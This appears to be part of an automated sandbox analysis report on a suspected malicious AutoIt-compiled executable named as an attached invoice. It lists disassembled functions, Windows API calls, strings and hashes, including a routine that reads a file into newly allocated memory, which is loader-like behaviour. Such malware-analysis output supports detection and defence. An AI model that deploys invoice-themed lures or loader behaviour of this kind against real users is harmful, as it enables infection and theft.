                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 55e01c8651c2b0a2841ff846f0497fbd92e9889b4900ada40794cb86d0773275
                            • Instruction ID: ae97e900a0f3cd77d9c2856aa67bdaaf1db0c534b349b1f467a96d5ef40e7042
                            • Opcode Fuzzy Hash: 55e01c8651c2b0a2841ff846f0497fbd92e9889b4900ada40794cb86d0773275
                            • Instruction Fuzzy Hash: 50E0D8328144019B52106738EC4D8EB775CFE56339F100B15F975C21E0E7B05D9085D5
                            Function 007BE800 Relevance: 3.6, Strings: 2, Instructions: 1102COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: H,$Variable must be of type 'Object'.
                            • API String ID: 0-2499936675
                            • Opcode ID: fe89efe6d32f9ac8a5a76fdb06a270da768a287c3c71c71317b6a65d4ac2287b
                            • Instruction ID: c92bef3d524a0ad262f810cd45188518ba6f7ef5afbdcaad0fc4f903510a25f6
                            • Opcode Fuzzy Hash: fe89efe6d32f9ac8a5a76fdb06a270da768a287c3c71c71317b6a65d4ac2287b
                            • Instruction Fuzzy Hash: C8A25A74A04209CFDB24DF58C884BEAB7B1FF58310F248469E916AB355D739ED82CB91
                            Function 007C0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C0BBB
                            • timeGetTime.WINMM ref: 007C0E76
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C0FB3
                            • TranslateMessage.USER32(?), ref: 007C0FC7
                            • DispatchMessageW.USER32(?), ref: 007C0FD5
                            • Sleep.KERNEL32(0000000A), ref: 007C0FDF
                            • LockWindowUpdate.USER32(00000000,?,?), ref: 007C105A
                            • DestroyWindow.USER32 ref: 007C1066
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007C1080
                            • Sleep.KERNEL32(0000000A,?,?), ref: 007F52AD
                            • TranslateMessage.USER32(?), ref: 007F608A
                            • DispatchMessageW.USER32(?), ref: 007F6098
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007F60AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                            • API String ID: 4003667617-3242690629
                            • Opcode ID: 247c775a0e02a7ff6ca1669324e3cccb07466f2beb5c002e3aa14f5dd7d2b442
                            • Instruction ID: afafb92f98d489dcbeb6d0934b10bb379b98d9b14af225fd49fb8f4f83cdef47
                            • Opcode Fuzzy Hash: 247c775a0e02a7ff6ca1669324e3cccb07466f2beb5c002e3aa14f5dd7d2b442
                            • Instruction Fuzzy Hash: DEB2C070608745DFD724DF24C888FAAB7E5BF84304F14491DE69A973A1DB78E884CB92
                            Function 007B71EB Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 201registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007B4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008762F8,?,007B37C0,?), ref: 007B4882
                              • Part of subcall function 007D074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007B72C5), ref: 007D0771
                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007B7308
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007EECF1
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007EED32
                            • RegCloseKey.ADVAPI32(?), ref: 007EED70
                            • _wcscat.LIBCMT ref: 007EEDC9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                            • String ID: @)$Include$Software\AutoIt v3\AutoIt$\$\Include\$x(
                            • API String ID: 2673923337-3749564996
                            • Opcode ID: 39bff706ebd7319257a006336fdaf8b6dc977e3d48f29b71711de6b579307299
                            • Instruction ID: 3c4da279d254597815407bd3acc327c0de2c3077f87767ea54a523f266359629
                            • Opcode Fuzzy Hash: 39bff706ebd7319257a006336fdaf8b6dc977e3d48f29b71711de6b579307299
                            • Instruction Fuzzy Hash: E0716C715193019EC314EF25DC8999BBBE8FF98300B40492EF55AD32B2EB74D988CB91
                            Function 008193DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 008191E9: __time64.LIBCMT ref: 008191F3
                              • Part of subcall function 007B5045: _fseek.LIBCMT ref: 007B505D
                            • __wsplitpath.LIBCMT ref: 008194BE
                              • Part of subcall function 007D432E: __wsplitpath_helper.LIBCMT ref: 007D436E
                            • _wcscpy.LIBCMT ref: 008194D1
                            • _wcscat.LIBCMT ref: 008194E4
                            • __wsplitpath.LIBCMT ref: 00819509
                            • _wcscat.LIBCMT ref: 0081951F
                            • _wcscat.LIBCMT ref: 00819532
                              • Part of subcall function 0081922F: _memmove.LIBCMT ref: 00819268
                              • Part of subcall function 0081922F: _memmove.LIBCMT ref: 00819277
                            • _wcscmp.LIBCMT ref: 00819479
                              • Part of subcall function 008199BE: _wcscmp.LIBCMT ref: 00819AAE
                              • Part of subcall function 008199BE: _wcscmp.LIBCMT ref: 00819AC1
                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008196DC
                            • _wcsncpy.LIBCMT ref: 0081974F
                            • DeleteFileW.KERNEL32(?,?), ref: 00819785
                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0081979B
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008197AC
                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008197BE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 1500180987-0
                            • Opcode ID: a82ea6d89ca661efa675dbd49a1af5cf29b5d8645c9e5d9e4a37487cf43a5f74
                            • Instruction ID: 7d2b8c225caa1be7743a50cef147611fb31a9472b27936380c5fcbcd4cd8341f
                            • Opcode Fuzzy Hash: a82ea6d89ca661efa675dbd49a1af5cf29b5d8645c9e5d9e4a37487cf43a5f74
                            • Instruction Fuzzy Hash: A9C13AB1D00219AADF21DFA5CC85EDEB7BDFF54310F0044AAF609E6251EB349A848F65
                            Function 007B3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 007B3A62
                            • LoadCursorW.USER32(00000000,00007F00), ref: 007B3A71
                            • LoadIconW.USER32(00000063), ref: 007B3A88
                            • LoadIconW.USER32(000000A4), ref: 007B3A9A
                            • LoadIconW.USER32(000000A2), ref: 007B3AAC
                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007B3AD2
                            • RegisterClassExW.USER32(?), ref: 007B3B28
                              • Part of subcall function 007B3041: GetSysColorBrush.USER32(0000000F), ref: 007B3074
                              • Part of subcall function 007B3041: RegisterClassExW.USER32(00000030), ref: 007B309E
                              • Part of subcall function 007B3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007B30AF
                              • Part of subcall function 007B3041: LoadIconW.USER32(000000A9), ref: 007B30F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                            • String ID: #$0$AutoIt v3
                            • API String ID: 2880975755-4155596026
                            • Opcode ID: 2e05c11c682123bb31be23b6b9f73b79c91bcd89c98214b90e7f4132829878b9
                            • Instruction ID: 80e46e2f327ffeec7a2d432a97a3442e961e45132ec5e2e064549423bd7f0251
                            • Opcode Fuzzy Hash: 2e05c11c682123bb31be23b6b9f73b79c91bcd89c98214b90e7f4132829878b9
                            • Instruction Fuzzy Hash: FA214F70D10304AFDB509FA4EC09B9D7BF5FB08710F004129F608A62A6E7BA95A48F84
                            Function 007B3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                            Download Yara Rule

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                            • API String ID: 1825951767-3513169116
                            • Opcode ID: b95904b8ba42d9ab38e2fb47417dc45e17805e9fee215521d0694660ad855aff
                            • Instruction ID: 3eeaab77be0488d44aadf2d066adce86c55e01a0e0e933ec11f2d36284e058a9
                            • Opcode Fuzzy Hash: b95904b8ba42d9ab38e2fb47417dc45e17805e9fee215521d0694660ad855aff
                            • Instruction Fuzzy Hash: EEA11F7191022DDACB14EFA4CC99FEEB778BF14300F04052AE516B7192EF799A49CB61
                            Function 007B3015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 75registrywindowclipboardCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 007B3074
                            • RegisterClassExW.USER32(00000030), ref: 007B309E
                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007B30AF
                            • LoadIconW.USER32(000000A9), ref: 007B30F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 975902462-1005189915
                            • Opcode ID: 718dc2e8853df3ddcf1e327fc1c25aa87e62035889b6be50afa577e5731c7f0a
                            • Instruction ID: 4e2e0508198f808f18248dcc6322ff615332b2d7a793620cce3706cb701c98b7
                            • Opcode Fuzzy Hash: 718dc2e8853df3ddcf1e327fc1c25aa87e62035889b6be50afa577e5731c7f0a
                            • Instruction Fuzzy Hash: EB315AB1C00749AFDB50CFA4DC88AC9BBF0FF09310F14452AE695E62A2E3B59594CF91
                            Function 007B3041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 007B3074
                            • RegisterClassExW.USER32(00000030), ref: 007B309E
                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007B30AF
                            • LoadIconW.USER32(000000A9), ref: 007B30F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 975902462-1005189915
                            • Opcode ID: ed5fac9932a299bf16aeb72c80c7d1bdabe49f819819acac6e777a77c56ca113
                            • Instruction ID: ed45dedbd80a0b78e6c75f0e284a7cf88bfa87c1e8de91e83f51778a13c95b90
                            • Opcode Fuzzy Hash: ed5fac9932a299bf16aeb72c80c7d1bdabe49f819819acac6e777a77c56ca113
                            • Instruction Fuzzy Hash: A721E5B1D10618AFDB00DFA4E988BDDBBF4FB08700F00452AFA14E62A1E7B58594CF91
                            Function 007625E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 949 7625e0-76268e call 760000 952 762695-7626bb call 7634f0 CreateFileW 949->952 955 7626c2-7626d2 952->955 956 7626bd 952->956 963 7626d4 955->963 964 7626d9-7626f3 VirtualAlloc 955->964 957 76280d-762811 956->957 958 762853-762856 957->958 959 762813-762817 957->959 965 762859-762860 958->965 961 762823-762827 959->961 962 762819-76281c 959->962 966 762837-76283b 961->966 967 762829-762833 961->967 962->961 963->957 968 7626f5 964->968 969 7626fa-762711 ReadFile 964->969 970 7628b5-7628ca 965->970 971 762862-76286d 965->971 976 76283d-762847 966->976 977 76284b 966->977 967->966 968->957 978 762713 969->978 979 762718-762758 VirtualAlloc 969->979 974 7628cc-7628d7 VirtualFree 970->974 975 7628da-7628e2 970->975 972 762871-76287d 971->972 973 76286f 971->973 980 762891-76289d 972->980 981 76287f-76288f 972->981 973->970 974->975 976->977 977->958 978->957 982 76275f-76277a call 763740 979->982 983 76275a 979->983 986 76289f-7628a8 980->986 987 7628aa-7628b0 980->987 985 7628b3 981->985 989 762785-76278f 982->989 983->957 985->965 986->985 987->985 990 7627c2-7627d6 call 763550 989->990 991 762791-7627c0 call 763740 989->991 997 7627da-7627de 990->997 998 7627d8 990->998 991->989 999 7627e0-7627e4 FindCloseChangeNotification 997->999 1000 7627ea-7627ee 997->1000 998->957 999->1000 1001 7627f0-7627fb VirtualFree 1000->1001 1002 7627fe-762807 1000->1002 1001->1002 1002->952 1002->957
                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 007626B1
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007628D7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198887255.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_760000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction ID: 984c807957792d667f4d50d94308161610311b707a136b679e040887481dad96
                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction Fuzzy Hash: C8A11974E00209EBDB54CFA4C994BEEB7B5FF48305F208159E902BB281D7799A41CF94
                            Function 007BF8CF Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D03D3
                              • Part of subcall function 007D03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007D03DB
                              • Part of subcall function 007D03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D03E6
                              • Part of subcall function 007D03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D03F1
                              • Part of subcall function 007D03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007D03F9
                              • Part of subcall function 007D03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 007D0401
                              • Part of subcall function 007C6259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 007C62B4
                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007BFB2D
                            • OleInitialize.OLE32(00000000), ref: 007BFBAA
                            • CloseHandle.KERNEL32(00000000), ref: 007F49F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                            • String ID: 0Z$0$H
                            • API String ID: 3094916012-3186381342
                            • Opcode ID: 75574b5c1ed2420add0b62dacd32b042bcbfc573cf6563d87226affd826aafbd
                            • Instruction ID: 153a8c146dd99be723c78ce802dac7ecb905b99bb3a58de884d335656f60a521
                            • Opcode Fuzzy Hash: 75574b5c1ed2420add0b62dacd32b042bcbfc573cf6563d87226affd826aafbd
                            • Instruction Fuzzy Hash: 4881B8B0901A40CEC798DF79E94D6557BE4FB98318714826E911CC736AFB35C4A8CF58
                            Function 007B73E5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1111 7b73e5-7b7405 call 7e1b90 1114 7b740b-7b7438 call 7b48ae call 7d09d5 call 7b716b call 7b69ca 1111->1114 1115 7eee4b-7eeeb4 call 7d3020 75D3D0D0 1111->1115 1121 7eeebd-7eeec6 call 7b7d2c 1115->1121 1122 7eeeb6 1115->1122 1126 7eeecb 1121->1126 1122->1121 1126->1126
                            APIs
                            • _memset.LIBCMT ref: 007EEE62
                            • 75D3D0D0.COMDLG32(?), ref: 007EEEAC
                              • Part of subcall function 007B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B48A1,?,?,007B37C0,?), ref: 007B48CE
                              • Part of subcall function 007D09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D09F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: NamePath$FullLong_memset
                            • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                            • API String ID: 3051022977-1954568251
                            • Opcode ID: 015a87636b77daa52496f509d58f071dd6ddd70fb5618c9b26bb0f21dd789797
                            • Instruction ID: 0fa403756da26206362bf329048ba81402d49e2bf9c2fd0e9351b576c2e3dd24
                            • Opcode Fuzzy Hash: 015a87636b77daa52496f509d58f071dd6ddd70fb5618c9b26bb0f21dd789797
                            • Instruction Fuzzy Hash: 3B21A471A002989BDB159F94C849BEE7BFDAF49310F00801AE508E7281DBB85989CFA1
                            Function 007B39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1141 7b39e7-7b3a57 CreateWindowExW * 2 ShowWindow * 2
                            APIs
                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B3A15
                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3A36
                            • ShowWindow.USER32(00000000,?,?), ref: 007B3A4A
                            • ShowWindow.USER32(00000000,?,?), ref: 007B3A53
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
